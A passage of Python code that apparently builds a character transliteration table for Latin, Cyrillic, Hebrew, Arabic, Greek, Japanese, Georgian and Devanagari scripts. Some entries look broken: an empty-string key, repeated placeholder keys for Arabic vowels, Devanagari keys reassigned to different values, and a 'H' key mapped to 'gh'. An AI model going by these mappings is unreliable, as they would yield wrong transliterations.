u\"ŢȚŤṪṬṮṰŦƬƮ\":\n self.trans[char] = u\"T\"\n for char in u\"ţțťṫṭṯṱŧȾƭʈ\":\n self.trans[char] = u\"t\"\n for char in u\"ÙÚŨṸṴÜṲŪṺŬỤŮŲǓṶỦƯỮỰỬ\":\n self.trans[char] = u\"U\"\n for char in u\"ùúũṹṵüṳūṻŭụůųǔṷủưữựửʉ\":\n self.trans[char] = u\"u\"\n for char in u\"ȔŰǛǗǕǙ\":\n self.trans[char] = u\"Ü\"\n for char in u\"ȕűǜǘǖǚ\":\n self.trans[char] = u\"ü\"\n self.trans[u\"Û\"] = u\"Ux\"\n self.trans[u\"û\"] = u\"ux\"\n self.trans[u\"Ȗ\"] = u\"Û\"\n self.trans[u\"ȗ\"] = u\"û\"\n self.trans[u\"Ừ\"] = u\"Ù\"\n self.trans[u\"ừ\"] = u\"ù\"\n self.trans[u\"Ứ\"] = u\"Ú\"\n self.trans[u\"ứ\"] = u\"ú\"\n for char in u\"ṼṾ\":\n self.trans[char] = u\"V\"\n for char in u\"ṽṿ\":\n self.trans[char] = u\"v\"\n for char in u\"ẀẂŴẄẆẈ\":\n self.trans[char] = u\"W\"\n for char in u\"ẁẃŵẅẇẉ\":\n self.trans[char] = u\"w\"\n for char in u\"ẊẌ\":\n self.trans[char] = u\"X\"\n for char in u\"ẋẍ\":\n self.trans[char] = u\"x\"\n for char in u\"ỲÝŶŸỸȲẎỴỶƳ\":\n self.trans[char] = u\"Y\"\n for char in u\"ỳýŷÿỹȳẏỵỷƴ\":\n self.trans[char] = u\"y\"\n for char in u\"ŹẐŻẒŽẔƵȤ\":\n self.trans[char] = u\"Z\"\n for char in u\"źẑżẓžẕƶȥ\":\n self.trans[char] = u\"z\"\n self.trans[u\"ɀ\"] = u\"zv\"\n\n # Latin: extended Latin alphabet\n self.trans[u\"ɑ\"] = u\"a\"\n for char in u\"ÆǼǢ\":\n self.trans[char] = u\"AE\"\n for char in u\"æǽǣ\":\n self.trans[char] = u\"ae\"\n self.trans[u\"Ð\"] = u\"Dh\"\n self.trans[u\"ð\"] = u\"dh\"\n for char in u\"ƎƏƐ\":\n self.trans[char] = u\"E\"\n for char in u\"ǝəɛ\":\n self.trans[char] = u\"e\"\n for char in u\"ƔƢ\":\n self.trans[char] = u\"G\"\n for char in u\"ᵷɣƣᵹ\":\n self.trans[char] = u\"g\"\n self.trans[u\"Ƅ\"] = u\"H\"\n self.trans[u\"ƅ\"] = u\"h\"\n self.trans[u\"Ƕ\"] = u\"Wh\"\n self.trans[u\"ƕ\"] = u\"wh\"\n self.trans[u\"Ɩ\"] = u\"I\"\n self.trans[u\"ɩ\"] = u\"i\"\n self.trans[u\"Ŋ\"] = u\"Ng\"\n self.trans[u\"ŋ\"] = u\"ng\"\n self.trans[u\"Œ\"] = u\"OE\"\n self.trans[u\"œ\"] = u\"oe\"\n self.trans[u\"Ɔ\"] = u\"O\"\n self.trans[u\"ɔ\"] = u\"o\"\n self.trans[u\"Ȣ\"] = u\"Ou\"\n self.trans[u\"ȣ\"] = u\"ou\"\n self.trans[u\"Ƽ\"] = u\"Q\"\n for char in u\"ĸƽ\":\n self.trans[char] = u\"q\"\n self.trans[u\"ȹ\"] = u\"qp\"\n self.trans[u\"\"] = u\"r\"\n self.trans[u\"ſ\"] = u\"s\"\n self.trans[u\"ß\"] = u\"ss\"\n self.trans[u\"Ʃ\"] = u\"Sh\"\n for char in u\"ʃᶋ\":\n self.trans[char] = u\"sh\"\n self.trans[u\"Ʉ\"] = u\"U\"\n self.trans[u\"ʉ\"] = u\"u\"\n self.trans[u\"Ʌ\"] = u\"V\"\n self.trans[u\"ʌ\"] = u\"v\"\n for char in u\"ƜǷ\":\n self.trans[char] = u\"W\"\n for char in u\"ɯƿ\":\n self.trans[char] = u\"w\"\n self.trans[u\"Ȝ\"] = u\"Y\"\n self.trans[u\"ȝ\"] = u\"y\"\n self.trans[u\"IJ\"] = u\"IJ\"\n self.trans[u\"ij\"] = u\"ij\"\n self.trans[u\"Ƨ\"] = u\"Z\"\n for char in u\"ʮƨ\":\n self.trans[char] = u\"z\"\n self.trans[u\"Ʒ\"] = u\"Zh\"\n self.trans[u\"ʒ\"] = u\"zh\"\n self.trans[u\"Ǯ\"] = u\"Dzh\"\n self.trans[u\"ǯ\"] = u\"dzh\"\n for char in u\"ƸƹʔˀɁɂ\":\n self.trans[char] = u\"'\"\n self.trans['Þ'] = 'Th'\n self.trans['þ'] = 'th'\n for char in u\"Cʗǃ\":\n self.trans[char] = u\"!\"\n\n # Punctuation and typography\n for char in u\"«»“”„¨\":\n self.trans[char] = u'\"'\n for char in u\"‘’′\":\n self.trans[char] = u\"'\"\n self.trans[u\"•\"] = u\"*\"\n self.trans[u\"@\"] = u\"(at)\"\n self.trans[u\"¤\"] = u\"$\"\n self.trans[u\"¢\"] = u\"c\"\n self.trans[u\"€\"] = u\"E\"\n self.trans[u\"£\"] = u\"L\"\n self.trans[u\"¥\"] = u\"yen\"\n self.trans[u\"†\"] = u\"+\"\n self.trans[u\"‡\"] = u\"++\"\n self.trans[u\"°\"] = u\":\"\n self.trans[u\"¡\"] = u\"!\"\n self.trans[u\"¿\"] = u\"?\"\n self.trans[u\"‰\"] = u\"o/oo\"\n self.trans[u\"‱\"] = u\"o/ooo\"\n for char in u\"¶§\":\n self.trans[char] = u\">\"\n self.trans['…'] = '...'\n for char in u\"‒–—―\":\n self.trans[char] = u\"-\"\n self.trans['·'] = ' '\n self.trans[u\"¦\"] = u\"|\"\n self.trans[u\"⁂\"] = u\"***\"\n self.trans[u\"◊\"] = u\"<>\"\n self.trans[u\"‽\"] = u\"?!\"\n self.trans[u\"؟\"] = u\";-)\"\n self.trans[u\"¹\"] = u\"1\"\n self.trans[u\"²\"] = u\"2\"\n self.trans[u\"³\"] = u\"3\"\n\n # Cyrillic\n self.trans.update({u\"А\": u\"A\", u\"а\": u\"a\", u\"Б\": u\"B\", u\"б\": u\"b\",\n u\"В\": u\"V\", u\"в\": u\"v\", u\"Г\": u\"G\", u\"г\": u\"g\",\n u\"Д\": u\"D\", u\"д\": u\"d\", u\"Е\": u\"E\", u\"е\": u\"e\",\n u\"Ж\": u\"Zh\", u\"ж\": u\"zh\", u\"З\": u\"Z\", u\"з\": u\"z\",\n u\"И\": u\"I\", u\"и\": u\"i\", u\"Й\": u\"J\", u\"й\": u\"j\",\n u\"К\": u\"K\", u\"к\": u\"k\", u\"Л\": u\"L\", u\"л\": u\"l\",\n u\"М\": u\"M\", u\"м\": u\"m\", u\"Н\": u\"N\", u\"н\": u\"n\",\n u\"О\": u\"O\", u\"о\": u\"o\", u\"П\": u\"P\", u\"п\": u\"p\",\n u\"Р\": u\"R\", u\"р\": u\"r\", u\"С\": u\"S\", u\"с\": u\"s\",\n u\"Т\": u\"T\", u\"т\": u\"t\", u\"У\": u\"U\", u\"у\": u\"u\",\n u\"Ф\": u\"F\", u\"ф\": u\"f\", u\"х\": u\"kh\", u\"Ц\": u\"C\",\n u\"ц\": u\"c\", u\"Ч\": u\"Ch\", u\"ч\": u\"ch\", u\"Ш\": u\"Sh\",\n u\"ш\": u\"sh\", u\"Щ\": u\"Shch\", u\"щ\": u\"shch\", u\"Ь\": u\"'\",\n u\"ь\": \"'\", u\"Ъ\": u'\"', u\"ъ\": '\"', u\"Ю\": u\"Yu\",\n u\"ю\": u\"yu\", u\"Я\": u\"Ya\", u\"я\": u\"ya\", u\"Х\": u\"Kh\",\n u\"Χ\": u\"Kh\"})\n\n # Additional Cyrillic letters, most occuring in only one or a few languages\n self.trans.update({u\"Ы\": u\"Y\", u\"ы\": u\"y\", u\"Ё\": u\"Ë\", u\"ё\": u\"ë\",\n u\"Э\": u\"È\", u\"Ѐ\": u\"È\", u\"э\": u\"è\", u\"ѐ\": u\"è\",\n u\"І\": u\"I\", u\"і\": u\"i\", u\"Ї\": u\"Ji\", u\"ї\": u\"ji\",\n u\"Є\": u\"Je\", u\"є\": u\"je\", u\"Ґ\": u\"G\", u\"Ҝ\": u\"G\",\n u\"ґ\": u\"g\", u\"ҝ\": u\"g\", u\"Ђ\": u\"Dj\", u\"ђ\": u\"dj\",\n \"Љ\": \"Lj\", \"љ\": \"lj\",\n u\"Њ\": u\"Nj\", u\"њ\": u\"nj\", u\"Ћ\": u\"Cj\", u\"ћ\": u\"cj\",\n 'Җ': 'Zhj', 'Ѓ': 'Gj', 'ѓ': 'gj',\n u\"Ќ\": u\"Kj\", u\"ќ\": u\"kj\", u\"Ӣ\": u\"Ii\", u\"ӣ\": u\"ii\",\n \"Ҳ\": \"H\", \"ҳ\": \"h\",\n u\"Ҷ\": u\"Dz\", u\"ҷ\": u\"dz\", u\"Ө\": u\"Ô\", u\"Ӫ\": u\"Ô\",\n u\"ө\": u\"ô\", u\"ӫ\": u\"ô\", u\"Ү\": u\"Y\", u\"ү\": u\"y\", u\"Һ\": u\"H\",\n u\"һ\": u\"h\", u\"Ә\": u\"AE\", u\"Ӕ\": u\"AE\", u\"ә\": u\"ae\",\n 'Ӛ': 'Ë', 'Ӭ': 'Ë', 'ӛ': 'ë', 'ӭ': 'ë',\n 'җ': 'zhj', 'Ұ': 'U', 'ў': 'ù', 'Ў': 'Ù',\n u\"ѝ\": u\"ì\", u\"Ѝ\": u\"Ì\", u\"Ӑ\": u\"A\", u\"ă\": u\"a\", u\"Ӓ\": u\"Ä\",\n \"Ҽ\": \"Ts\", \"Ҿ\": \"Ts\", \"ҽ\": \"ts\", \"ҿ\": \"ts\",\n u\"Ҙ\": u\"Dh\", u\"ҙ\": u\"dh\", u\"Ӏ\": u\"\", u\"ӏ\": u\"\", u\"Ӆ\": u\"L\",\n u\"ӆ\": u\"l\", u\"Ӎ\": u\"M\", u\"ӎ\": u\"m\", u\"Ӧ\": u\"Ö\", u\"ӧ\": u\"ö\",\n u\"Ҩ\": u\"u\", u\"ҩ\": u\"u\", u\"Ҧ\": u\"Ph\", u\"ҧ\": u\"ph\", u\"Ҏ\": u\"R\",\n u\"ҏ\": u\"r\", u\"Ҫ\": u\"Th\", u\"ҫ\": u\"th\", u\"Ҭ\": u\"T\", u\"ҭ\": u\"t\",\n 'Ӯ': 'Û', 'ӯ': 'û', 'Ӹ': 'U', 'ұ': 'u',\n u\"ӹ\": u\"u\", u\"Ҵ\": u\"Tts\", u\"ҵ\": u\"tts\", u\"Ӵ\": u\"Ch\", u\"ӵ\": u\"ch\"})\n\n for char in u\"ЈӤҊ\":\n self.trans[char] = u\"J\"\n for char in u\"јӥҋ\":\n self.trans[char] = u\"j\"\n for char in u\"ЏӁӜҶ\":\n self.trans[char] = u\"Dzh\"\n for char in u\"џӂӝҷ\":\n self.trans[char] = u\"dzh\"\n for char in u\"ЅӞӠӋҸ\":\n self.trans[char] = u\"Dz\"\n for char in u\"ѕӟӡӌҹ\":\n self.trans[char] = u\"dz\"\n for char in u\"ҒӶҔ\":\n self.trans[char] = u\"G\"\n for char in u\"ғӷҕ\":\n self.trans[char] = u\"g\"\n for char in u\"ҚҞҠӃ\":\n self.trans[char] = u\"Q\"\n for char in u\"қҟҡӄ\":\n self.trans[char] = u\"q\"\n for char in u\"ҢҤӉӇ\":\n self.trans[char] = u\"Ng\"\n for char in u\"ңҥӊӈ\":\n self.trans[char] = u\"ng\"\n for char in u\"ӖѢҌ\":\n self.trans[char] = u\"E\"\n for char in u\"ӗѣҍ\":\n self.trans[char] = u\"e\"\n for char in u\"ӲӰҮ\":\n self.trans[char] = u\"Ü\"\n for char in u\"ӳӱү\":\n self.trans[char] = u\"ü\"\n\n # Archaic Cyrillic letters\n self.trans.update({u\"Ѹ\": u\"Ou\", u\"ѹ\": u\"ou\", u\"Ѡ\": u\"O\", u\"Ѻ\": u\"O\", u\"ѡ\": u\"o\",\n u\"ѻ\": u\"o\", u\"Ѿ\": u\"Ot\", u\"ѿ\": u\"ot\", u\"Ѣ\": u\"E\", u\"ѣ\": u\"e\",\n u\"Ѥ\": u\"Ei\", u\"Ѧ\": u\"Ei\", u\"ѥ\": u\"ei\", u\"ѧ\": u\"ei\", u\"Ѫ\": u\"Ai\",\n u\"ѫ\": u\"ai\", u\"Ѯ\": u\"X\", u\"ѯ\": u\"x\", u\"Ѱ\": u\"Ps\", u\"ѱ\": u\"ps\",\n u\"Ѳ\": u\"Th\", u\"ѳ\": u\"th\", u\"Ѵ\": u\"Ü\", u\"Ѷ\": u\"Ü\", u\"ѵ\": u\"ü\"})\n\n # Hebrew alphabet\n for char in u\"אע\":\n self.trans[char] = u\"'\"\n self.trans[u\"ב\"] = u\"b\"\n self.trans[u\"ג\"] = u\"g\"\n self.trans[u\"ד\"] = u\"d\"\n self.trans[u\"ה\"] = u\"h\"\n self.trans[u\"ו\"] = u\"v\"\n self.trans[u\"ז\"] = u\"z\"\n self.trans[u\"ח\"] = u\"kh\"\n self.trans[u\"ט\"] = u\"t\"\n self.trans[u\"י\"] = u\"y\"\n for char in u\"ךכ\":\n self.trans[char] = u\"k\"\n self.trans[u\"ל\"] = u\"l\"\n for char in u\"םמ\":\n self.trans[char] = u\"m\"\n for char in u\"ןנ\":\n self.trans[char] = u\"n\"\n self.trans[u\"ס\"] = u\"s\"\n for char in u\"ףפ\":\n self.trans[char] = u\"ph\"\n for char in u\"ץצ\":\n self.trans[char] = u\"ts\"\n self.trans[u\"ק\"] = u\"q\"\n self.trans[u\"ר\"] = u\"r\"\n self.trans[u\"ש\"] = u\"sh\"\n self.trans[u\"ת\"] = u\"th\"\n\n # Arab alphabet\n for char in u\"اﺍﺎ\":\n self.trans[char] = u\"a\"\n for char in u\"بﺏﺐﺒﺑ\":\n self.trans[char] = u\"b\"\n for char in u\"تﺕﺖﺘﺗ\":\n self.trans[char] = u\"t\"\n for char in u\"ثﺙﺚﺜﺛ\":\n self.trans[char] = u\"th\"\n for char in u\"جﺝﺞﺠﺟ\":\n self.trans[char] = u\"g\"\n for char in u\"حﺡﺢﺤﺣ\":\n self.trans[char] = u\"h\"\n for char in u\"خﺥﺦﺨﺧ\":\n self.trans[char] = u\"kh\"\n for char in u\"دﺩﺪ\":\n self.trans[char] = u\"d\"\n for char in u\"ذﺫﺬ\":\n self.trans[char] = u\"dh\"\n for char in u\"رﺭﺮ\":\n self.trans[char] = u\"r\"\n for char in u\"زﺯﺰ\":\n self.trans[char] = u\"z\"\n for char in u\"سﺱﺲﺴﺳ\":\n self.trans[char] = u\"s\"\n for char in u\"شﺵﺶﺸﺷ\":\n self.trans[char] = u\"sh\"\n for char in u\"صﺹﺺﺼﺻ\":\n self.trans[char] = u\"s\"\n for char in u\"ضﺽﺾﻀﺿ\":\n self.trans[char] = u\"d\"\n for char in u\"طﻁﻂﻄﻃ\":\n self.trans[char] = u\"t\"\n for char in u\"ظﻅﻆﻈﻇ\":\n self.trans[char] = u\"z\"\n for char in u\"عﻉﻊﻌﻋ\":\n self.trans[char] = u\"'\"\n for char in u\"غﻍﻎﻐﻏ\":\n self.trans[char] = u\"gh\"\n for char in u\"فﻑﻒﻔﻓ\":\n self.trans[char] = u\"f\"\n for char in u\"قﻕﻖﻘﻗ\":\n self.trans[char] = u\"q\"\n for char in u\"كﻙﻚﻜﻛک\":\n self.trans[char] = u\"k\"\n for char in u\"لﻝﻞﻠﻟ\":\n self.trans[char] = u\"l\"\n for char in u\"مﻡﻢﻤﻣ\":\n self.trans[char] = u\"m\"\n for char in u\"نﻥﻦﻨﻧ\":\n self.trans[char] = u\"n\"\n for char in u\"هﻩﻪﻬﻫ\":\n self.trans[char] = u\"h\"\n for char in u\"وﻭﻮ\":\n self.trans[char] = u\"w\"\n for char in u\"یيﻱﻲﻴﻳ\":\n self.trans[char] = u\"y\"\n # Arabic - additional letters, modified letters and ligatures\n self.trans[u\"ﺀ\"] = u\"'\"\n for char in u\"آﺁﺂ\":\n self.trans[char] = u\"'a\"\n for char in u\"ةﺓﺔ\":\n self.trans[char] = u\"th\"\n for char in u\"ىﻯﻰ\":\n self.trans[char] = u\"á\"\n for char in u\"یﯼﯽﯿﯾ\":\n self.trans[char] = u\"y\"\n self.trans[u\"؟\"] = u\"?\"\n # Arabic - ligatures\n for char in u\"ﻻﻼ\":\n self.trans[char] = u\"la\"\n self.trans[u\"ﷲ\"] = u\"llah\"\n for char in u\"إأ\":\n self.trans[char] = u\"a'\"\n self.trans[u\"ؤ\"] = u\"w'\"\n self.trans[u\"ئ\"] = u\"y'\"\n for char in u\"◌◌\":\n self.trans[char] = u\"\" # indicates absence of vowels\n # Arabic vowels\n self.trans[u\"◌\"] = u\"a\"\n self.trans[u\"◌\"] = u\"u\"\n self.trans[u\"◌\"] = u\"i\"\n self.trans[u\"◌\"] = u\"a\"\n self.trans[u\"◌\"] = u\"ay\"\n self.trans[u\"◌\"] = u\"ay\"\n self.trans[u\"◌\"] = u\"u\"\n self.trans[u\"◌\"] = u\"iy\"\n # Arab numerals\n for char in u\"٠۰\":\n self.trans[char] = u\"0\"\n for char in u\"١۱\":\n self.trans[char] = u\"1\"\n for char in u\"٢۲\":\n self.trans[char] = u\"2\"\n for char in u\"٣۳\":\n self.trans[char] = u\"3\"\n for char in u\"٤۴\":\n self.trans[char] = u\"4\"\n for char in u\"٥۵\":\n self.trans[char] = u\"5\"\n for char in u\"٦۶\":\n self.trans[char] = u\"6\"\n for char in u\"٧۷\":\n self.trans[char] = u\"7\"\n for char in u\"٨۸\":\n self.trans[char] = u\"8\"\n for char in u\"٩۹\":\n self.trans[char] = u\"9\"\n # Perso-Arabic\n for char in u\"پﭙﭙپ\":\n self.trans[char] = u\"p\"\n for char in u\"چچچچ\":\n self.trans[char] = u\"ch\"\n for char in u\"ژژ\":\n self.trans[char] = u\"zh\"\n for char in u\"گﮔﮕﮓ\":\n self.trans[char] = u\"g\"\n\n # Greek\n self.trans.update({u\"Α\": u\"A\", u\"α\": u\"a\", u\"Β\": u\"B\", u\"β\": u\"b\", u\"Γ\": u\"G\",\n u\"γ\": u\"g\", u\"Δ\": u\"D\", u\"δ\": u\"d\", u\"Ε\": u\"E\", u\"ε\": u\"e\",\n u\"Ζ\": u\"Z\", u\"ζ\": u\"z\", u\"Η\": u\"I\", u\"η\": u\"i\", u\"θ\": u\"th\",\n u\"Θ\": u\"Th\", u\"Ι\": u\"I\", u\"ι\": u\"i\", u\"Κ\": u\"K\", u\"κ\": u\"k\",\n u\"Λ\": u\"L\", u\"λ\": u\"l\", u\"Μ\": u\"M\", u\"μ\": u\"m\", u\"Ν\": u\"N\",\n u\"ν\": u\"n\", u\"Ξ\": u\"X\", u\"ξ\": u\"x\", u\"Ο\": u\"O\", u\"ο\": u\"o\",\n u\"Π\": u\"P\", u\"π\": u\"p\", u\"Ρ\": u\"R\", u\"ρ\": u\"r\", u\"Σ\": u\"S\",\n u\"σ\": u\"s\", u\"ς\": u\"s\", u\"Τ\": u\"T\", u\"τ\": u\"t\", u\"Υ\": u\"Y\",\n u\"υ\": u\"y\", u\"Φ\": u\"F\", u\"φ\": u\"f\", u\"Ψ\": u\"Ps\", u\"ψ\": u\"ps\",\n u\"Ω\": u\"O\", u\"ω\": u\"o\", u\"ϗ\": u\"&\", u\"Ϛ\": u\"St\", u\"ϛ\": u\"st\",\n u\"Ϙ\": u\"Q\", u\"Ϟ\": u\"Q\", u\"ϙ\": u\"q\", u\"ϟ\": u\"q\", u\"Ϻ\": u\"S\",\n u\"ϻ\": u\"s\", u\"Ϡ\": u\"Ss\", u\"ϡ\": u\"ss\", u\"Ϸ\": u\"Sh\", u\"ϸ\": u\"sh\",\n u\"·\": u\":\", u\"Ά\": u\"Á\", u\"ά\": u\"á\", u\"Έ\": u\"É\", u\"Ή\": u\"É\",\n u\"έ\": u\"é\", u\"ή\": u\"é\", u\"Ί\": u\"Í\", u\"ί\": u\"í\", u\"Ϊ\": u\"Ï\",\n u\"ϊ\": u\"ï\", u\"ΐ\": u\"ï\", u\"Ό\": u\"Ó\", u\"ό\": u\"ó\", u\"Ύ\": u\"Ý\",\n u\"ύ\": u\"ý\", u\"Ϋ\": u\"Y\", u\"ϋ\": u\"ÿ\", u\"ΰ\": u\"ÿ\", u\"Ώ\": u\"Ó\",\n u\"ώ\": u\"ó\"})\n\n # Japanese (katakana and hiragana)\n for char in u\"アァあ\":\n self.trans[char] = u\"a\"\n for char in u\"イィい\":\n self.trans[char] = u\"i\"\n for char in u\"ウう\":\n self.trans[char] = u\"u\"\n for char in u\"エェえ\":\n self.trans[char] = u\"e\"\n for char in u\"オォお\":\n self.trans[char] = u\"o\"\n for char in u\"ャや\":\n self.trans[char] = u\"ya\"\n for char in u\"ュゆ\":\n self.trans[char] = u\"yu\"\n for char in u\"ョよ\":\n self.trans[char] = u\"yo\"\n for char in u\"カか\":\n self.trans[char] = u\"ka\"\n for char in u\"キき\":\n self.trans[char] = u\"ki\"\n for char in u\"クく\":\n self.trans[char] = u\"ku\"\n for char in u\"ケけ\":\n self.trans[char] = u\"ke\"\n for char in u\"コこ\":\n self.trans[char] = u\"ko\"\n for char in u\"サさ\":\n self.trans[char] = u\"sa\"\n for char in u\"シし\":\n self.trans[char] = u\"shi\"\n for char in u\"スす\":\n self.trans[char] = u\"su\"\n for char in u\"セせ\":\n self.trans[char] = u\"se\"\n for char in u\"ソそ\":\n self.trans[char] = u\"so\"\n for char in u\"タた\":\n self.trans[char] = u\"ta\"\n for char in u\"チち\":\n self.trans[char] = u\"chi\"\n for char in u\"ツつ\":\n self.trans[char] = u\"tsu\"\n for char in u\"テて\":\n self.trans[char] = u\"te\"\n for char in u\"トと\":\n self.trans[char] = u\"to\"\n for char in u\"ナな\":\n self.trans[char] = u\"na\"\n for char in u\"ニに\":\n self.trans[char] = u\"ni\"\n for char in u\"ヌぬ\":\n self.trans[char] = u\"nu\"\n for char in u\"ネね\":\n self.trans[char] = u\"ne\"\n for char in u\"ノの\":\n self.trans[char] = u\"no\"\n for char in u\"ハは\":\n self.trans[char] = u\"ha\"\n for char in u\"ヒひ\":\n self.trans[char] = u\"hi\"\n for char in u\"フふ\":\n self.trans[char] = u\"fu\"\n for char in u\"ヘへ\":\n self.trans[char] = u\"he\"\n for char in u\"ホほ\":\n self.trans[char] = u\"ho\"\n for char in u\"マま\":\n self.trans[char] = u\"ma\"\n for char in u\"ミみ\":\n self.trans[char] = u\"mi\"\n for char in u\"ムむ\":\n self.trans[char] = u\"mu\"\n for char in u\"メめ\":\n self.trans[char] = u\"me\"\n for char in u\"モも\":\n self.trans[char] = u\"mo\"\n for char in u\"ラら\":\n self.trans[char] = u\"ra\"\n for char in u\"リり\":\n self.trans[char] = u\"ri\"\n for char in u\"ルる\":\n self.trans[char] = u\"ru\"\n for char in u\"レれ\":\n self.trans[char] = u\"re\"\n for char in u\"ロろ\":\n self.trans[char] = u\"ro\"\n for char in u\"ワわ\":\n self.trans[char] = u\"wa\"\n for char in u\"ヰゐ\":\n self.trans[char] = u\"wi\"\n for char in u\"ヱゑ\":\n self.trans[char] = u\"we\"\n for char in u\"ヲを\":\n self.trans[char] = u\"wo\"\n for char in u\"ンん\":\n self.trans[char] = u\"n\"\n for char in u\"ガが\":\n self.trans[char] = u\"ga\"\n for char in u\"ギぎ\":\n self.trans[char] = u\"gi\"\n for char in u\"グぐ\":\n self.trans[char] = u\"gu\"\n for char in u\"ゲげ\":\n self.trans[char] = u\"ge\"\n for char in u\"ゴご\":\n self.trans[char] = u\"go\"\n for char in u\"ザざ\":\n self.trans[char] = u\"za\"\n for char in u\"ジじ\":\n self.trans[char] = u\"ji\"\n for char in u\"ズず\":\n self.trans[char] = u\"zu\"\n for char in u\"ゼぜ\":\n self.trans[char] = u\"ze\"\n for char in u\"ゾぞ\":\n self.trans[char] = u\"zo\"\n for char in u\"ダだ\":\n self.trans[char] = u\"da\"\n for char in u\"ヂぢ\":\n self.trans[char] = u\"dji\"\n for char in u\"ヅづ\":\n self.trans[char] = u\"dzu\"\n for char in u\"デで\":\n self.trans[char] = u\"de\"\n for char in u\"ドど\":\n self.trans[char] = u\"do\"\n for char in u\"バば\":\n self.trans[char] = u\"ba\"\n for char in u\"ビび\":\n self.trans[char] = u\"bi\"\n for char in u\"ブぶ\":\n self.trans[char] = u\"bu\"\n for char in u\"ベべ\":\n self.trans[char] = u\"be\"\n for char in u\"ボぼ\":\n self.trans[char] = u\"bo\"\n for char in u\"パぱ\":\n self.trans[char] = u\"pa\"\n for char in u\"ピぴ\":\n self.trans[char] = u\"pi\"\n for char in u\"プぷ\":\n self.trans[char] = u\"pu\"\n for char in u\"ペぺ\":\n self.trans[char] = u\"pe\"\n for char in u\"ポぽ\":\n self.trans[char] = u\"po\"\n for char in u\"ヴゔ\":\n self.trans[char] = u\"vu\"\n self.trans[u\"ヷ\"] = u\"va\"\n self.trans[u\"ヸ\"] = u\"vi\"\n self.trans[u\"ヹ\"] = u\"ve\"\n self.trans[u\"ヺ\"] = u\"vo\"\n\n # Japanese and Chinese punctuation and typography\n for char in u\"・·\":\n self.trans[char] = u\" \"\n for char in u\"〃『』《》\":\n self.trans[char] = u'\"'\n for char in u\"「」〈〉〘〙〚〛\":\n self.trans[char] = u\"'\"\n for char in u\"(〔\":\n self.trans[char] = u\"(\"\n for char in u\")〕\":\n self.trans[char] = u\")\"\n for char in u\"[【〖\":\n self.trans[char] = u\"[\"\n for char in u\"]】〗\":\n self.trans[char] = u\"]\"\n self.trans['{'] = '{'\n self.trans['}'] = '}'\n self.trans['っ'] = ':'\n self.trans['ー'] = 'h'\n self.trans['゛'] = \"'\"\n self.trans['゜'] = 'p'\n self.trans['。'] = '. '\n self.trans['、'] = ', '\n self.trans['・'] = ' '\n self.trans['〆'] = 'shime'\n self.trans['〜'] = '-'\n self.trans['…'] = '...'\n self.trans['‥'] = '..'\n self.trans['ヶ'] = 'months'\n for char in u\"•◦\":\n self.trans[char] = u\"_\"\n for char in u\"※*\":\n self.trans[char] = u\"*\"\n self.trans['Ⓧ'] = '(X)'\n self.trans['Ⓨ'] = '(Y)'\n self.trans['!'] = '!'\n self.trans['?'] = '?'\n self.trans[';'] = ';'\n self.trans[':'] = ':'\n self.trans['。'] = '.'\n for char in u\",、\":\n self.trans[char] = u\",\"\n\n # Georgian\n self.trans['ა'] = 'a'\n self.trans['ბ'] = 'b'\n self.trans['გ'] = 'g'\n self.trans['დ'] = 'd'\n for char in u\"ეჱ\":\n self.trans[char] = u\"e\"\n self.trans['ვ'] = 'v'\n self.trans['ზ'] = 'z'\n self.trans['თ'] = 'th'\n self.trans['ი'] = 'i'\n self.trans['კ'] = 'k'\n self.trans['ლ'] = 'l'\n self.trans['მ'] = 'm'\n self.trans['ნ'] = 'n'\n self.trans['ო'] = 'o'\n self.trans['პ'] = 'p'\n self.trans['ჟ'] = 'zh'\n self.trans['რ'] = 'r'\n self.trans['ს'] = 's'\n self.trans['ტ'] = 't'\n self.trans['უ'] = 'u'\n self.trans['ფ'] = 'ph'\n self.trans['ქ'] = 'q'\n self.trans['ღ'] = 'gh'\n for char in u\"ყ\":\n self.trans[char] = u\"q'\"\n self.trans['შ'] = 'sh'\n self.trans['ჩ'] = 'ch'\n self.trans['ც'] = 'ts'\n self.trans['ძ'] = 'dz'\n for char in u\"წ\":\n self.trans[char] = u\"ts'\"\n for char in u\"ჭ\":\n self.trans[char] = u\"ch'\"\n self.trans['ხ'] = 'kh'\n self.trans['ჯ'] = 'j'\n self.trans['ჰ'] = 'h'\n self.trans['ჳ'] = 'w'\n self.trans['ჵ'] = 'o'\n self.trans['ჶ'] = 'f'\n\n # Devanagari\n for char in u\"पप\":\n self.trans[char] = u\"p\"\n self.trans['अ'] = 'a'\n for char in u\"आा\":\n self.trans[char] = u\"aa\"\n self.trans['प'] = 'pa'\n for char in u\"इि\":\n self.trans[char] = u\"i\"\n for char in u\"ईी\":\n self.trans[char] = u\"ii\"\n for char in u\"उु\":\n self.trans[char] = u\"u\"\n for char in u\"ऊू\":\n self.trans[char] = u\"uu\"\n for char in u\"एे\":\n self.trans[char] = u\"e\"\n for char in u\"ऐै\":\n self.trans[char] = u\"ai\"\n for char in u\"ओो\":\n self.trans[char] = u\"o\"\n for char in u\"औौ\":\n self.trans[char] = u\"au\"\n for char in u\"ऋृर\":\n self.trans[char] = u\"r\"\n for char in u\"ॠॄ\":\n self.trans[char] = u\"rr\"\n for char in u\"ऌॢल\":\n self.trans[char] = u\"l\"\n for char in u\"ॡॣ\":\n self.trans[char] = u\"ll\"\n self.trans['क'] = 'k'\n self.trans['ख'] = 'kh'\n self.trans['ग'] = 'g'\n self.trans['घ'] = 'gh'\n self.trans['ङ'] = 'ng'\n self.trans['च'] = 'c'\n self.trans['छ'] = 'ch'\n self.trans['ज'] = 'j'\n self.trans['झ'] = 'jh'\n self.trans['ञ'] = 'ñ'\n for char in u\"टत\":\n self.trans[char] = u\"t\"\n for char in u\"ठथ\":\n self.trans[char] = u\"th\"\n for char in u\"डद\":\n self.trans[char] = u\"d\"\n for char in u\"ढध\":\n self.trans[char] = u\"dh\"\n for char in u\"णन\":\n self.trans[char] = u\"n\"\n self.trans['फ'] = 'ph'\n self.trans['ब'] = 'b'\n self.trans['भ'] = 'bh'\n self.trans['म'] = 'm'\n self.trans['य'] = 'y'\n self.trans['व'] = 'v'\n self.trans['श'] = 'sh'\n for char in u\"षस\":\n self.trans[char] = u\"s\"\n self.trans['ह'] = 'h'\n self.trans['क'] = 'x'\n self.trans['त'] = 'tr'\n self.trans['ज'] = 'gj'\n for char in u\"क़\":\n self.trans[char] = u\"q\"\n self.trans['फ'] = 'f'\n self.trans['ख'] = 'hh'\n self.trans['H'] = 'gh'\n self.trans['ज'] = 'z'\n for char in u\"डढ\":\n self.trans[char] = u\"r\"\n # Devanagari ligatures (possibly incomplete and/or incorrect)\n for char in u\"ख्\":\n 